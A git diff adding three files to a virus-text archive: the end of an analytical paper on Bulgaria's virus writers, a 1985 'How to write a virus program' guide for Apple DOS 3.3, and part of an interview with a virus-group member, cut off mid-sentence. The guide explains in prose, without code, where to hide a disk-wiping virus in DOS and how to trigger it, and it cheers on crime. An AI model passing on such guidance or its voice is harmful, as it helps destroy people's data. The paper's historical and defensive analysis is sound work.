rest of the world is big +enough. But this is not all. Since possession of "viral knowledge" +(i.e., live viruses, virus source code) has always tempted hackers +and since the legitimate anti--virus researchers usually exchange +such things only between themselves and in a very restricted manner, +it is not surprising that similar "virus boards" began to pop up +around the world. There are currently such BBSes in the USA, Germany, +Italy, Sweden, Czechoslovakia, the UK and the Soviet Union. Stopping +their activities is very difficult in legal terms, because the +possession, storage or willful downloading of computer viruses +usually is not considered as a criminal offence. And it shouldn't be +--- otherwise the anti--virus researchers themselves will not have a +way to exchange virus samples to work with. + +The creation of a virus--oriented BBS, the system operator of which +supported the writing, spreading and exchanging of virus code didn't +go unnoticed in Bulgaria. Almost all virus writers have obtained a +modem (a not very easy thing in Bulgaria) and contacted it. +Afterwards, they began to contact each other by means of electronic +messages on this BBS. They have even created a specialized local +conference (local for Bulgaria), in order to keep in touch and to +exchange ideas how to write clever viruses. Therefore, they began to +organize themselves --- a thing that cannot be said about the +anti--virus research community in all countries... + +3) New ideas. +============= + +As it can be seen from the examples above, the whole of Bulgaria has +turned into some kind of computer virus developing laboratory, where +any capable (or not so capable) pupil/student/ programmer is tempted +to write his own virus and to test it in the wild. It is not +therefore unusual that several completely new ideas were first +developed in our country. I shall try to enumerate here some (only +the most important) of them. + + +- The interrupt tracing technique, capable of finding the original + handler (in DOS or BIOS) of any interrupt vector, has been first + implemented in the YANKEE DOODLE (TP) viruses. Later other viruses in + the world began to use it (4096, NAUGHTY HACKER). + +- The "fast infectors" --- viruses that infect on file opening or + even on any file operation were first developed in Bulgaria. The + first such virus was the DARK AVENGER. Now there are a lot of fast + infectors. One of them --- 1963 --- even infects on file deletion. + +- The "semi--stealth" viruses --- viruses that hide the increasing of + the size of the infected files (the 651 virus) or that remove them + from the inflected files when one loads them with a debugger (YANKEE + DOODLE) both are viruses, made in our country. + +- Hiding the true file length usually causes problems, because CHKDSK + is able to detect the difference between the disk space marked as + used in the FAT and the reported file length. Only two Bulgarian + viruses in the world are able to handle this problem --- DIAMOND and + V2100. + +- The first really "stealth" file infector --- the 512 virus was + Bulgarian. It is true however, that the idea has been discovered + independently almost at the same time in other parts of the world + (the 4096 virus from Israel). + +- The only known stealth parasitic virus, which "stealthy" features + go down to the BIOS level (i.e., it cannot be detected if active in + memory even if the infected file is read at sector and not at file + level) is the Bulgarian INT13 virus. + +- One of the first multi--partite viruses (viruses that are able to + infect both files and boot sectors) --- the ANTHRAX virus, has been + developed in Bulgaria. It is true, however, that similar ideas can be + noticed in the 4096 and GHOST BALLS viruses, which are developed much + earlier. Also, other multi--partite viruses (VIRUS-101, V-1, FLIP, + INVADER) were created independently almost at the same time (and even + earlier) in other parts of the world. + +- The idea first used in the LEHIGH virus --- to place the virus body + in an unused part of the file COMMAND.COM has been further developed + by several Bulgarian viruses. They all can infect any COM or EXE file + (unlike the LEHIGH virus) in the usual way, but when they are + infecting the command interpreter, they place themselves in an area + filled with zeros at the end of the file and thus in this case they + do not increase its length. Such viruses are TERROR, NAUGHTY HACKER + and others. + +- The method, mentioned above has been developed even further by + other Bulgarian viruses. They have noticed that any sufficiently + large area of zeros in any file (not just COMMAND.COM) can be used to + hide the virus body. The viruses that use this method are again of + Bulgarian origin --- PROUD, EVIL, PHOENIX, RAT, DARTH VADER... The + latter even does not write to the infected files --- it leaves this + task to DOS. And the RAT virus hides itself into the unused part of + the EXE file headers. + +- One of the extremely mutating viruses is the Dark Avenger's virus + LEECH. It can exist in more than 4.5 billion variants. It is true, + however, that this is neither the first entirely mutating virus (1260 + being the first), nor it has the most flexible mutating mechanism (it + is much simpler than V2P6Z). + +- A completely new type of computer virus (DIR II) has been developed + by two Bulgarian pupils. This virus does not infect neither files, + nor boot sectors. Instead, it infects file systems as a whole, or + more exactly --- directory entries. + +- Different tricks to get control without directly hooking the INT + 21h vector were developed by several Bulgarian virus writers. The + TERROR virus places a JMP instruction to its body in the original INT + 21h handler in DOS. The viruses from the PHOENIX family ( 800, 1226, + PROUD, EVIL, PHOENIX) hook an interrupt that is called by DOS on + every file--related function (INT 2Ah, AH=82h). The DIR II virus + patches itself in the chain of DOS disk device drivers. + +- The first virus, that is able to infect device drivers (SYS files + only), is, of course, Bulgarian. This is the HAPPY NEW YEAR ( 1600) + virus. + +- The first fully functional parasitic virus, written entirely in a + high level language (Turbo PASCAL) is the Bulgarian virus SENTINEL. + +- The Bulgarian virus ANTHRAX is the first virus that is resident in + memory only temporary. It removes itself from there after it has + infected the first file and then acts as a non--resident virus. + +- The shortest memory resident virus in the IBM PC world --- only 128 + bytes --- is again developed in Bulgaria. There are reports about a + 108--byte resident virus, also from there, but they are unconfirmed + yet. + +- The shortest virus in the IBM PC world --- only 45 bytes long, is + the Bulgarian virus MINIMAL-45. It seems possible, however, to + shorten it even further --- up to 31 bytes, with a big loss of + reliability. + +4) Why so many viruses are created in Bulgaria. +=============================================== + +Computer viruses are created in all parts of the world, not only in +Bulgaria. However, the portion of them that are created in our +country is extremely high. Therefore, in the whole world there exist +preconditions that make virus writing tempting, but in Bulgaria there +exist specific conditions as well. + +4.1) Specific reasons for virus writing in Bulgaria. +---------------------------------------------------- + +4.1.1) + +The first, and most important of all is the existence of a +huge army of young and extremely qualified people, computer wizards, +that are not actively involved in the economic life. + +The computerization in Bulgaria began without economical reasons. +Since our country was a socialist one, its economics was of +administrative type. The economics didn't need to be computerized. In +fact, computers and planned economics are quite incompatible --- +computers help you to produce more in less time and with less effort +and money, while the goal of a manager in a planned economics is to +fulfil the plan exactly as it is given --- for no more and no less +time, and with no more and no less money. However, the communist +party leaders in Bulgaria decided that we should computerize --- +mainly to be able to supply computers to the Soviet Union and +circumvent the embargo. + +While computerization in itself is not a bad thing, we made a very +severe mistake. Bulgarian economics was very weak (now it is even +weaker), but we had quite a lot skilled people. Therefore, we should +not have tried to produce hardware while we had good chances in the +software industry, where mainly "brainware" is required. However, +Bulgaria did just the opposite. Instead of buying the hardware, we +began to produce it (mainly illegal Apple and IBM clones). Instead of +producing our own software and to try to sell it in the West, we +began to steal Western computer programs, to change some copyright +notices in them, and to re--sell them (mainly in Bulgaria, in the +Soviet Union, and in the other countries of the former Eastern +block). + +At that time most Western software was copy protected. Instead of +training our skilled people in writing their own programs, we began +to train them to break copy protection schemes. And they achieved +great success in this field. The Bulgarian hackers are maybe the best +in cracking copy protected programs. Besides, they had no real hope +in making and selling their own programs, since, due to the total +lack of copyright law on computer software, it was impossible to sell +more than two or three examples of a computer program in Bulgaria. +The rest were copied. + +Since the introduction of computers in the Bulgarian offices was not +a natural process, but due to an administrative order, very often +these computers were not used --- they were only considered as an +object of prestige. Very often on the desk of a company director, +near the phone, stood a personal computer. The director himself +almost never used the computer --- however sometimes his/her children +came to the office to use it --- to play games or to investigate its +internals. While the price of personal computers in Bulgaria was too +high to permit a private person to have his/her own computer, it was +a common practice to use the computer at the office for personal +reasons. At the same time, the computer education was very widely +introduced in Bulgaria. Everyone was educated in this field --- from +children in the kindergartens to old teachers that had just a few +years until pension. Since this kind of science is better +comprehended by younger brains, it is no wonder that the people, who +became most skilled in this field, were very young. Very young and +not morally grown--up. We spent a lot of effort teaching these people +how to program, but forgot to educate them in computer ethics. +Besides, the lack of respect to the others' work is a common problem +in the socialist societies. + +4.1.2) + +The second main reason is the wide--spread practice of software +pirating (which was, in fact, a kind of state policy) and the very +low payment of the average programmers. + +As was mentioned above, Bulgaria took the wrong decision in producing +computers and stealing programs. There is still no copyright law, +concerning computer software there. Because of this, the software +piracy was an extremely widespread practice. In fact, almost all +software products used were illegal copies. Most people using them +have never seen the original diskettes or original documentation. +Very often there was no documentation at all. + +Since all kinds of programs (from games to desktop publishing +systems) were copied very often, this greatly helped for the spread +of computer viruses. + +At the same time, the work of the average programmer was evaluated +very low --- there were almost no chances to sell his/her software +products. Even now, a programmer in Bulgaria is paid 100 to 120 times +less than the programmer with the same qualification in the USA. + +This caused several young people to become embittered against the +society that was unable to evaluate them as it should. There is only +one step in the transformation of these young people into creators of +destructive viruses. Some of them (e.g., the Dark Avenger) took this +step. + +4.1.3) + +The third major reason is the total lack of legislative against +creation and willful distribution of computer viruses and against +illegal access and modification of computer information in general. + + +Because of the lack of copyright laws on computer software, there is +no such thing as ownership of computer information in Bulgaria. +Therefore, the modification or even the destruction of computer +information is not considered a crime --- since no one's property is +damaged. + +The Bulgarian legislature is hopelessly old in this area. +Furthermore, even if the appropriate law is accepted in the future, +as a punishing law it will not be able to be applied to crimes, +committed before it was passed. Therefore, the virus writers still +have nothing to fear of. + +That is why, the creation of new computer viruses has become some +kind of sport or entertainment in Bulgaria. + +4.1.4) + +The next reason is the very weak organization of the fight against +computer viruses in Bulgaria. Just now our country is in a very deep +economical crisis. We lack funds for everything, including such basic +goods as food and gasoline. At the same time, the organization of the +virus fight would require money --- for the establishment of a +network of virus test centers that collect and investigate computer +viruses, centers equipped with the best hardware, centers that are +able to communicate between themselves and with the other similar +centers in the world in an effective way. Such an effective way is +the electronic mail system --- and Bulgaria still does its first +steps in global computer communications. All this requires a lot of +money --- money that our government just does not have now. 4.1.5) +Another reason is the incorrect opinion, that the society has on the +computer virus problem. + +Still, the victims of a computer virus attack consider themselves as +victims of a bad joke, not as victims of a crime. + +4.1.6) + +The least important reason, in my opinion, is the availability and +the easy access to information of a particular kind. + +All kind of tricks how to fool the operating system circulate among +the Bulgarian hackers. Some of them are often published in the +computer related magazines. As it was mentioned above, there is even +a specialized BBS, dedicated to virus spreading and a special (local +to Bulgaria) FidoNet echo, dedicated to virus writing. Not to mention +the well--known file INTERxyy, published by Ralf Brown from the USA +as shareware. It is very popular in Bulgaria, since it contains, +carefully described, a huge number of undocumented tricks. + +However, this is not a very important reason. Usually those, who have +decided to make a virus already know how to do it, or, at least, can +figure it out by themselves. They do not need to take an existing +virus and to modify it. The proof is the prevalence of original +Bulgarian viruses over the variants of known ones, as well as the +fact, that many new ideas for virus writing were first invented and +implemented in Bulgaria. + +4.2) General reasons. +--------------------- + +Since viruses are also created in all the other parts of the world, +there should be also some general reasons for this. These reasons +are, of course, valid for Bulgaria too. Let's see these general +reasons. + +4.2.1) Wish for glory. + +Every programmer dreams that his/her program gets widely spread and +used. A lot of very good programmers write and distribute wonderful +software packages for free --- with the only intention to have more +users using their package. However, for a program to be used, it has +to be good enough. And not every programmer is able to make a program +so good that the users will widely use it --- even for free. At the +same time, computer viruses do spread very widely, regardless and +even against the users' will. So, when a virus writer reads in a +newspaper that his virus has been discovered at the other end of the +world, he feels some kind of perverted pleasure. Some people write +viruses just to see their names (or the names of their viruses) +published in the newspapers. This reason has yet another aspect. In +the beginning of the virus era, when the idea of the computer virus +was very new, only the very good programmers were able to make a +virus. It became a common myth that if you can write a virus, you're +a great programmer. This myth might have been justified at the +beginning, but now it is completely without sense. Nevertheless, +young hackers began to write viruses --- just to prove to their +friends and to the rest of the world how good programmers they are. +Some of them were really unable to invent something original --- +that's why they just picked a known virus, modified it a bit and +released this new mutation. This explains why there are so many +variants of the simplest viruses that were first created --- BRAIN, +JERUSALEM, STONED, VIENNA, CASCADE... A typical example is the +Italian virus writer, who calls himself Cracker Jack. + +4.2.2) Simple human curiosity. + +One has to admit that the idea of a computer program that is able to +spread by its own means, to replicate, to hide from the user (who is +believed to maintain the computer under full control), and in general +to behave as a real live being is really fascinating. Just simple +human curiosity is sufficient to make some people, if they are young +and irresponsible enough, to try to make a computer virus. Some of +them do succeed. A greater and greater part, if we consider the +amount of last reports for new viruses. Some of them claim that they +are writing viruses "only for themselves," "only for fun," and that +"they do not spread them." However, it is often impossible to fully +control the spread of a "successful" computer virus. The more clever +these viruses are, the greater the probability that they will +"escape." There is an idea to teach students how viruses are made --- +of course in a very strongly restricted environment. Maybe at least +for some this will fulfil their curiosity and they will not be +tempted to write their own virus. Maybe if we force every computer +science student to learn Dr. Fred Cohen's theorems on the +computational aspects of computer viruses, if we administer an exam +and ask students to design a virus protection scheme or to help a +cluster of users, attacked by a computer virus for a course work --- +well, maybe in this case these students will have more than enough of +the computer virus problem and will not want to hear about it any +more --- least to make their own viruses. 4.2.3) Easy access to +information. + +Sufficient information, needed to write a virus can be found easily. +This information is often even more accessible than in Bulgaria. + +The person that wants to write an average virus needs only to dig in +the respective manuals --- manuals, which are often not available in +Bulgaria. However, the usefulness of the easy access to this +information is much greater than the damage, caused by the fact that +it is used by the virus writers. + +4.2.4) Military interests. + +It is often rumoured that the superpowers are working on the problem +how to use computer viruses to destroy the enemy computers' software. +It is even very probable, that in several countries such research is +performed. There are reports on this from the USA, France and the +USSR. + +This is no wonder --- it is the right of every military force to +investigate any new idea and to consider the possible usefulness +and/or threats it might bring to the national defense. However, it is +quite improbable that the computer viruses can be used for this +purpose. Just like the live viruses, the computer ones are able to +spread only among individuals with very similar immunotype, i.e. --- +among compatible computers. The most widely used kinds of personal +computers are the IBM PC, Macintosh, Amiga and Atari ST. It is +therefore no wonder that the vast majority of existing computer +viruses are able to infect only these computers. In the same time, +viruses that infect one kind of computer (say, IBM PC), are unable to +spread (or even to run) on another (e.g., a Macintosh). They are +usually not able to run even on two different operating systems in +one and the same computer. Even a different version of the same +operating system might cause big problems to a particular computer +virus --- up to preventing it to work. The common personal computers +are never assigned important tasks in the army. Therefore, even if a +virus infects them, and even if it destroys all the data on all such +computers, the caused damage will not be of great importance. +Computers that are used for the really important things, such as +rocket leading or cannon aiming, are always specialized ones. Their +programs are usually hard--coded and only data can be entered in +them. It is not possible to insert an infected IBM PC diskette in the +computers that control the NORAD system. At the same time, the +computers that control different important devices are usually +incompatible even between themselves. Therefore, even if someone +writes a virus for a specialized rocket computer, this virus will not +be able to infect the computers of a strategic bomber or even these +of a rocket of a different system. So, such virus will not spread +very much. And last, but not least, such virus has to be placed +somehow in the enemy's computers. Since, as we saw above, it won't be +able to spread from one computer to another of a different kind, +obviously someone has to insert it in the victim computer. But if you +have access to the enemy's computers, you don't need a virus. You can +do the same task easier (and often much better) "manually", or with a +Trojan horse or a logic bomb. 4..2.5) Corporate interests. + +It is also often speculated that the large software companies and the +producers of anti--virus software make or willfully spread computer +viruses. + +There is some reason behind this. Indeed the fear of viruses can make +the user buy only original software (sometimes --- quite expensive), +and not to use pirated copies, shareware or freeware. At the same +time, companies that produce anti--virus software are interested that +their products are sold. And they will be, if the user needs +anti--virus protection. However, it is rather improbable, that a +software company (whether producing or not anti--virus software) will +take the risk to become known that it willfully spreads viruses. It +will be probably boycotted by its users and the losses of income will +be much greater than any gains. As to the producers of anti--virus +software, they don't need to write viruses themselves, in order to +sell their programs. It is sufficient to use the hype that the media +accords to the problem, to mention how many viruses there are and how +many of them their wonderful product is able to defeat. + +5) The Soviet virus factory and virus writing in the other countries +===================================================================== + of the former Eastern block. + ============================ + +While Bulgaria was one of the best computerized countries in East +Europe, the political, economical, and social conditions in the other +countries were (and maybe still are) quite similar. That is why the +virus writing and spreading has been developed in these countries +too. + +Viruses are created in Poland ( W13, 217, 583, FATHER CHRISTMAS, DOT +EATER, JOKER, VCOMM, AKUKU, 311, HYBRYD), in Hungary ( STONE `90, +FILLER, MONXLA, POLIMER, TURBO KUKAC), in Czechoslovakia (the +AANTIVIRUS virus), and even in Yugoslavia ( 17Y4, SVIR). According to +some reports from Romania, there are no viruses written there, but +the W13, YANKEE DOODLE, DARK AVENGER and StONED viruses are quite +widespread. + +However, the country most similar to Bulgaria is, undoubtedly, the +Soviet Union. According to the Soviet anti--virus researcher Bezrukov +[Bezrukov], the first virus appeared there almost at the same time as +in Bulgaria and, by the way, it was the same virus ( VIENNA). So, the +preconditions are almost the same as with our country. + +There are, however, two main differences: the level of +computerization and the number of virus writers. + +The level of computerization is still much lower than in Bulgaria. +There are much fewer computers per person than in our country. The +users are much more isolated, due to the much larger distances. The +telephone network is in the same miserable condition, as in Bulgaria. +The networks are very few and not widely used. For instance, in Sofia +alone there are more FidoNet nodes than in the whole Soviet Union. It +is not safe to send floppy disks by regular mail, since they will be +probably stolen. All this delays very much the spreading of viruses. +Unfortunately, it also delays the distribution of anti--virus +products and the information exchange between the anti--virus +researchers. For instance, examples of new viruses created there +reach the Western anti--virus researchers with huge delays. +Unfortunately, the other factor is much more dangerous. In the USSR +there are much more programmers than in Bulgaria and they seem at +least as much motivated in creating new viruses. The virus writing in +the Soviet Union is currently in the same state as it was in Bulgaria +about three years ago. However, at that time only nine variants of +known viruses and one stupid original virus has been created there (6 +VIENNA variants, 3 AMSTRAD variants, and the OLD YANKEE virus). At +the first Soviet anti--virus conference in Kiev (mid--November, 1990) +more than 35 different viruses of Russian origin were reported. + +Some of them were variants of known viruses, while others were +completely new. It has been noticed that the Soviet virus writers are +less qualified than the Bulgarian ones, but they use a destructive +payload in their creations much more often. + +Since the reasons of virus writing in the USSR are very similar to +those in Bulgaria; since this virus writing occurs in a much larger +scale; and since no steps are taken by the authorities in order to +stop it, it is possible to predict that in the next few years the +Soviet Union will be far ahead of Bulgaria in computer virus creation +and that a new, much larger wave of computer viruses will come from +there. Probably after a year, several (up to ten) virus writers with +the qualification of the Dark Avenger will emerge from there. + +6) The impact of the Bulgarian viruses on the West and on the national +====================================================================== + software industry. + ================== + +While a huge part of the existing viruses are +produced in Bulgaria, a relatively very small part of them spread +successfully to the West. Of more than 160 Bulgarian viruses, only +very few ( DARK AVENGER, V2000, V2100, PHOENIX, DIAMOND, +NOMENKLATURA, VACSINA, YANKEE DOODLE) are relatively widespread. At +the same time some of them ( DARK AVENGER, V2000, YANKEE DOODLE, +VACSINA) are extremely widespread. According to John McAfee, about 10 +% of all infections in the USA are caused by Bulgarian viruses --- +usually by the DARK AVENGER virus. In West Europe this virus shares +the popularity with YANKEE DOODLE and VACSINA. + +Of the viruses listed above, the major part are written by the Dark +Avenger --- all except YANKEE DOODLE and VACSINA. Almost all his +viruses (in this case --- with the exception of DIAMOND, which is the +least spread) are extremely destructive. The PHOENIX and NOMENKLATURA +viruses corrupt the FAT in such a subtle way, that when the user +notices the damage, there is no way to disinfect the infected files +and even to determine which files are damaged. The only way is to +reformat the hard disk. + +It is difficult to estimate the costs of all damage caused by +Bulgarian viruses. There are reports from Germany about a 10,000,000 +DM damage, caused only by the VACSINA virus. It is probable, however, +that these numbers are largely overestimated. + +The huge number of known Bulgarian viruses causes also indirect +damage to the West community, even if the viruses themselves do not +escape from Bulgaria, but only examples of them are supplied to the +anti--virus researchers. These researchers have to develop +anti--virus programs against these viruses (just in case the latter +succeed to spread outside Bulgaria). Therefore, they have to waste +their time and efforts. Furthermore, the user is forced to buy new +anti--virus programs (or pay for updates of the old ones), in order +to feel safe against these viruses. In the same time, the creation +and spreading of Bulgarian viruses causes a lot of damage to the +Bulgarian economics. In Bulgaria, the Bulgarian viruses are much more +widespread. More than 80 % of about 160 known Bulgarian viruses have +been detected in the wild in our country. It is difficult, however, +to evaluate, or even to estimate the exact costs of the caused +damage, since in Bulgaria the term "property of computer information" +simply does not exist in legal sense. It is the same with the cost of +this information. In fact, the creation of computer viruses causes +also indirect damage to our economics. First of all, a lot of +extremely capable people are wasting their minds to create +destructive viruses, instead of something useful. Second, the fact +that the Bulgarian programmers use their time to create computer +viruses destroys their reputation as a whole. No serious software +company accepts to deal with Bulgarian programmers or software +companies, because it is afraid that the supplied software might be +pirated or might contain a virus. 7) Conclusion. Virus writing in +Bulgaria is an extremely widespread hobby. Most of the major virus +writers are known, but no measures can be taken against them. Their +work causes a lot of damage to the Western community, as well as to +the national economics. Therefore, it is urgent to take legal +measures in this direction; measures that will make virus writing and +willful spread of computer viruses a criminal act. This is the only +way to stop, or at least to reduce the threat. + +References +========== + +[KV88] Viruses in Memory, Komputar za vas, 4--5, 1988, pp.12--13 (in +Bulgarian) + +[KV89] The Truth about Computer Viruses, Vesselin Bontchev, Komputar +za vas, 1--2, 1989, pp. 5--6 (in Bulgarian) + +[Chip] Die neue Gefahr --- Computerviren, Steffen Wernery, Chip, 9, +1987, pp. 34--37 (in German) + +[Bezrukov] Computer Virology, Nikolay Nikolaevitch Bezrukov, Kiev, +1991, ISBN 5-88500-931-X (in Russian) + + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/catvir.txt b/textfiles.com/virus/catvir.txt new file mode 100644 index 00000000..7dd57bf2 --- /dev/null +++ b/textfiles.com/virus/catvir.txt @@ -0,0 +1,148 @@ + + +From -- + + + + + ____________________________________________________________________________ +/ \ +| HOW TO WRITE A VIRUS PROGRAM | +| by | +| The Cheshire Cat | +\ / + !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! + + For people who have nothing else to do but cause unprecidented havoc + on other peoples systems, this is something you should read. To begin + with, I'd like to explain briefly to the ignorant readers of this, what + exactly a virus program is. A virus program is in the genre of tapeworm, + leech, and other such nasty programs. I will show clearly, one possible + application of it, on an Apple system, and I will demonstrate how easily + this little pest could lead to wiping out most of someone's important + disks. Here we go! + + One day, while I had little else to do, I was reading an computing + article in some obscure science magazine. As it happened, the article + discussed a growing problem in the computer community about the danger + of virus programs. Someone quoted in the article said that they wrote + a very simple virus program and put it on the univerisity computer as + a test. All the program did was look through the computers memory, + and devices (tape drives, hard drives, etc...) for stored programs, and + when it found one, it would search through the program for itself. If + it didn't find anything, it would find an empty spot in the program, and + implant itself. This may not sound too exciting, but this little program + was actually part of another program (maybe a word processor, or spread- + sheet, or maybe even zaxxon) and whenever someone ran that program, and + executed the little virus stuck inside it, the virus would stop program + execution (for a time period that even us humans wouldn't notice) and do + its little job of infecting other programs with itself. This example + of a virus was harmless, but even so, after only 4 hours the whole system + had to be shutdown and the whole memory core dumped because the virus had + begun to fill up too much space and it was using up all the mainframe's + time. I don't think it would have been so easy if this professor had + just done this experiment on his own and had not got permission or told + anyone about it. Think of the havoc!! + Well, that has taken up too much time discussing already, so I'll + add only one more thing before we get down to business, that REAL + viruses are extemely BAD. They usually are designed as time bombs that + start erasing disks, memory, and maybe even backups or the operating + system after they have been run so many times, or after a certain date + is reached. Someone did this to a bank one time (and by the way he was + never caught!) He was given the task of designing their operating system + and security, and he decided he wasn't getting paid enough, so he devised + his own method of compensation. Every so often, the computer would steal + a certain amount of money from the bank (by just CREATING it electronic- + ally) and would put it in an account that didn't exist as far as the bank + or the IRS or anybody knew, and whenever this guy wanted, he went to + the bank and withdrew some money. They aren't sure how he did it, but + he probably visited the electronic teller as often as possible. As I + said, the authorities still haven't found him, but after several years + of his leech program being in service, it "expired." They assume that + he set it up to destroy itself after so long, and when this little + program was gone, the bank suddenly was missing several million dollars. + Now, I wouldn't recommend doing this sort of thing, but then again, who + said crime doesn't pay? + Now to discuss the application of this to a Personal Computer is + very simple. When I decided to do this, I figured it would be easiest + to stick my program in the DOS, so that I would always know where to put + another copy of my virus while it was reproducing itself, and that it + would be easier to explain why the disk drive is running when it starts + to initialize your disks. For those who have a copy of Beneath Apple DOS + it would be easy to find the space to put in the program. If you don't, + I tell you a few places that are not used (or where you can put it and + it won't be noticed) but I'd recommend getting the book anyways - it's + an excellent tool for doing these sort of things, and useful even if you + don't. As suggestions for where to put it (if you choose to infect DOS), + you could use BCDF-BCFF which is still unused, or BFD9-BFFF, which WAS + unused, but has since been used in updates of DOS. Likewise, I would + also suggest using space taken up by junk like LOCK or UNLOCK commands. + Who the hell ever uses them? Think about it, when was the last time you + used the lock command? Get real. If you don't like that, how about + MAXFILES. I've only used that in a program once in my entire life. I + know people who couldn't even tell you what it does. That would make me + feel safe about sticking a virus there. + But now comes the part that will be harder for the inexperienced, + but easier as long as you know what you're doing. By the way, you've + been TOTALLY wasting your time reading this if you don't understand + assembly, because you HAVE TO in order to accomplish a task such as this. + But, don't fret, you could insert a little BASIC code into some dumb + utility (like an program whose only function is to initialize disks) that + would put itself on the disk, as it initializes it (probably as the hello + program) and would work from that aspect. Of course, it would be easier + for a less experienced person to detect, but who really cares! + As I was saying, however, you now have to write the code. If you + work in an area where you are limited memorywise (like I did) it can get + tough at times. The only way I got through it was by referring to + documented listings of all of DOS that I got somewhere, and using bits + and pieces of routines from other things as much as I could. When I + was done, I had a copy of DOS that when it was booted into the computer, + would work completely properly (except for maybe some bizarre circum- + stances that I didn't bother testing for), but when someone CATALOGed a + disk, it did a few different things. It would first load up the VTOC as + usual, but then it would jump to MY routine. In this instance, it was + very easy to use the VTOC which contains many unused bytes to house my + counter. I would increment it, check if it was time to destroy the disk, + and then execute an INIT, or just save the VTOC. Then it would save + three more sectors to the disk. One was the place where DOS branched to + my routines, the others were my actual routine. And thus was born a + virus. I guarentee that if anyone has experienced a problem with their + disks, it was not my fault because I have not yet implemented the virus. + No one has pissed me off enough to warrant its use. Even worse is the + fact that it could backfire (after being distributed across the country, + I don't doubt I'd end up with it also) because not only was it very well + planned, but you don't even notice any sort of a pause. The virus + executes itself so fast that there is little more than a microsecond of + a pause while the catalog is going on. I tried comparing it to a normal + catalog, and found I couldn't tell the difference. The only way this + thing wouldn't work is if the disk it was cataloging wasn't DOS 3.3, and + if that happened, it would probably screw the disk anyways. I know + there are people who will abuse this knowledge, so you may wonder why I + even bothered writing it. The fact is that it isn't important to shield + people from this knowledge, what is important is for people to know that + can be done, and perhaps find a way to prevent it. Just consider what + would happen if someone starting putting a virus in a DDD ][.2. First of + all, everyone would get a copy of it and use it. Only a few would be + that interested to check what these new updates to it were. And perhaps + within a month, whenever you tried to unpack a program, it would instead + initialize the disk with your file on it. So, like I said, beware of + those that would jeapordize themselves and would do such a thing. Of + course, I wouldn't hesitate to drop my "bomb" on a few leech friends of + mine who don't have modems, but thats a different story. I don't have + to worry too much about getting the "cold" back from them. They'll be + too screwed up to worry about trading disks. Well, I've said too much + already. Please keep my name on this file if you put it on your BBS, + ect..., but I don't really care if you want to put your local AE line + number, or whatever up at the beginning too, just give me credit where + I'm due. Thank-you, and good luck, and, as I said before, be careful + out there!! + + FROM -- THE CHESHIRE CAT + written: 12/30/85 +=-=-=-= If you need to reach me for more information, try E-mail on =-=-=-= +=-=-=-=-=-=-=-=-=-=-= OSB systems (215)-395-1291 =-=-=-=-=-=-=-=-=-=-=-=-=- +=-=-=-= I may offer a listing of my virus's coding if there is =-=-=-=-=-=- +=-=-=-= significant interest. But I leave you now, The Cheshire Cat -=-=-= +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +L5> \ No newline at end of file diff --git a/textfiles.com/virus/ccinterv.iew b/textfiles.com/virus/ccinterv.iew new file mode 100644 index 00000000..34fb3751 --- /dev/null +++ b/textfiles.com/virus/ccinterv.iew @@ -0,0 +1,257 @@ +-------------------------------------------------------------------------------- + INTERVIEW WITH CROM-CRUACH / TRIDENT / THE NETHERLANDS +-------------------------------------------------------------------------------- + + + Give me a short description of who you are! + +- Hacker, Phreaker, Raver, Freak & Stoner... + + From where did you get your handle? + +- Crom-Cr#ach is the ancient Irish supreme Wormgod... + + When did you discover the world of computers? + +- About ten years ago a nephew had a BBC I used to screw up. Then some + friends got C64s- and when the PC began to appear on the market, my + father bought one... + + How long have you been active in the scene? + +- With the C64 I joined some Dutch demogroups, about 8 jears ago... + + How did you came into the virus business? + +- Some years ago the media started to hype about the New Danger- I was + able to find a copy of Brain and Burger, debugged them to death + (no sources...) and made a simple direct-action .com infector (never + released, probably wiped out with one of my zillion hd-crashes). + + What part(s) of the underground do you think needs improvements? + +- The destructive part. I still can't figure why people smart enough + to make a nice virus are unable to see that they harm both foes and + friends with this... also, part of the underground still parties a + lot, but doesn't do anything against the continuing decrease of their + rights (Encryption ban/Clipper chip, war on drugs etc...) + + Positive/negative aspects of the scene? + +- Positive: The good tie between the groups, and the open distribution + of knowledge. + Negative: The quantity-above-quality attitude some still seem to + have. Please, amaze the scene by something inventive instead of yet + another boring dirct-action-.COM-infector! + + Have you been involved in any other group than Trident? + +- Yes, many, though this is the only specific virusgroup. + + Who started/created Trident? + +- Tardy, I thought... + + What's the groups goal? + +- Throw parties once in a while... ehrm, create and divide chaos? + + Who are the "leading/head-persons" in the group? + +- I can't really see a leader... we all program, each in our own style... + + What's your position in it? + +- Ehrm... virus author? :-) + + How is Trident (currently) organzied? + +- Not. Anarchy to the bone. + + Have you got any contacts with other virus-groups/programmers? + +- Yes, though I'm not really active in the swapping field... + + Can anyone ask for membership, or are you a "private" group? + +- Nah, it's private... + + Have you ever thought of/are you currently releasing some sort of + electronic magazine? + +- I wrote a hypertext Hitchhiker's Guide to Viruses, and stopped at + 90%. When I've got time, I'll finish it. Someday ;-) + + Are you into other things such as hacking and phreaking aswell, or + just viruses? + +- Yes, I've hacked and phreaked as well, though I haven't done this for + quite some time... + + Do you have some network-connection (some sort of e-mail or something)? + +- Yes, cc@weeds.hacktic.nl... + + Can you name a few viruses that members of Trident has written? + +- Yep. + + Which of them have you written yourself? + +- I haven't released that many; Little Mess, Horns of Jericho, Weirdo + and Cheeba were the only ones I believe- I rarely release my creations... + I mostly write programs showing a specific hole in the system + protection, I rarely build an entire virus around it... + + Which one was the hardest to write? + +- I really can't tell; I always write one because I want to try + something new- this always took some time... Cheeba was my first + EXE-infector; Little Mess spreads itself through Telix Salt-scripts, + I had to figure that format- and Horns of Jericho ate its way through + TB-Scan's .AVR files (if you can still remember TB using them...)- I + had to figure out that format as well... + + Do you have any sort of company or law-enforcement who are trying to + hunt Trident down? + +- Yes, the section Computercriminality of the CRI... + + Are they a real threat or just "childish"? + +- Neither; they mainly hunt authors of viruses that cause direct damage... + + Have you ever had any trouble in the group with the result of kicked + member(s)? + +- No... + + How good are Trident comparing to other groups? + +- So, what answer do you expect? ;-) + + Do you call out aloth, and if so how? (phone/internet etc.) + +- I mainly hang out on the Internet, I rarely call BBSses... + + Do you have any couriers that spread your products around? + +- I do not spread my viruses; if I make one, I publish it in a 